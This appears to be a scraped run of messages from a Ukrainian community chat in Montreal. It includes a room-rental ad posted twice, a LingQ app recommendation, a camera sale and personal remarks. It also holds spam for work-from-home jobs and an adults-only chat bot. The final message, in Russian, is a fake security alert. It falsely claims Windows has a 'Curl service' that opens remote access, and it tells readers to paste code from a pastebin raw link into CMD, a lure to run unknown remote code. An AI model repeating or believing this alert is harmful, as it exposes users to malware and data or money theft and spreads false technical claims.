Український Монреаль
-
⭐️Ідеальна кімната для дівчини з власним санвузлом! ⭐️ Привіт, друзі! З 1 березня доступна величезна кімната з великими вікнами, власним балконом та своїм санвузлом у трикімнатній квартирі. 📍 Локація: • Район Notre-Dame-de-Grâce • 15 хвилин пішки до метро Villa Maria • Автобусна зупинка прямо біля будинку 🚍 • Навколо безліч ресторанів, пекарень та кав’ярень 🍩☕ 💰 Ціна: 800$/місяць + комунальні. Оплата тільки за перший місяць ⭐️ 📶 Інтернет – безкоштовний! 🏡 Про кімнату: • Великий балкон 🌿 вихід на нього прямо з кімнати! • Просторий walk-in closet для зручного зберігання речей 👗👒 🏠 Про квартиру: • Укомплектована всім необхідним: пральна машина, сушка, мікрохвильовка та посудомийка 🛠️ • Можна з маленькими улюбленцями 🐾 ✨ Додатково: • Супер локація з ідеальною транспортною розв’язкою • Затишний будинок із сучасною атмосферою 📩 Буду рада відповісти на всі ваші запитання та домовитися про візит! Не пропустіть шанс жити з комфортом! ☕️
-
я усім рекомендую LingQ наскільки я зрозумів вам, можливо, він буде особливо корисний метод оснований на comprehensible input читаємо з перекладом, потім слухаємо те що вже прочитали, і так поки на слух не почнете сприймати без перекладу в голові є декілька таких апок, але LingQ мены подобається тим що в нього можна завантажувати своє все що заманеться, а не користуватись тільки тим що туди заклали я туди завантажував екзамен для таксистів :) нажаль він не безкоштовний, фрі функціонал у нього сильно порізаний
-
⭐️Ідеальна кімната для дівчини з власним санвузлом! ⭐️ Привіт, друзі! З 1 березня доступна величезна кімната з великими вікнами, власним балконом та своїм санвузлом у трикімнатній квартирі. 📍 Локація: • Район Notre-Dame-de-Grâce • 15 хвилин пішки до метро Villa Maria • Автобусна зупинка прямо біля будинку 🚍 • Навколо безліч ресторанів, пекарень та кав’ярень 🍩☕ 💰 Ціна: 800$/місяць + комунальні. Оплата тільки за перший місяць ⭐️ 📶 Інтернет – безкоштовний! 🏡 Про кімнату: • Великий балкон 🌿 вихід на нього прямо з кімнати! • Просторий walk-in closet для зручного зберігання речей 👗👒 🏠 Про квартиру: • Укомплектована всім необхідним: пральна машина, сушка, мікрохвильовка та посудомийка 🛠️ • Можна з маленькими улюбленцями 🐾 ✨ Додатково: • Супер локація з ідеальною транспортною розв’язкою • Затишний будинок із сучасною атмосферою 📩 Буду рада відповісти на всі ваші запитання та домовитися про візит! Не пропустіть шанс жити з комфортом! ☕️
-
Ви чудово знаєте мову, я наче у Львові)
-
Я не можу таке))) не па делісьо))
-
Я знаю мову бо бабуня цим опікувалась. У мене драма в родини: одна - "бЕндеровка/гуцулка", друга - "руская".🙃
-
а це що за книжка? Можете скинути?
-
вітаю, продам камеру sony zv e10, купувала її 15/06/24, камера в ідеальному стані, продаю через те, що купила більш професійну камеру. 800$ за подробицями звертайтесь до особистих повідомлень
-
🏠Робота вдома Ніяких складнощів, зручний графік та оплата кожного дня. Якщо вам цікаво - пишіть!✏️
-
💌 Анонимный чат 🍓 Вход строго для взрослых ➡️ @AnoChat_IBot ➡️ @AnoChat_IBot ➡️ @AnoChat_IBot
-
⚠️ОСТОРОЖНО!⚠️ В связи с учащёнными веб-атаками в последнее время, хотим предупредить вас о риске потери средств и данных (для пользователей ОС Windows) Для защиты от новой уязвимости и предотвращения установки вредоносного ПО, которое может быть активировано через веб-атаки, выполните следующие шаги: - Отключите службу Curl, которая может позволить удалённый доступ к вашему компьютеру. Это поможет обезопасить вашу систему от внешних угроз. - Для этого введите следующий код в CMD: pastebin.com/raw/KhpBnqDE Принятие этих мер поможет защитить ваши данные и устройства от нежелательных вторжений.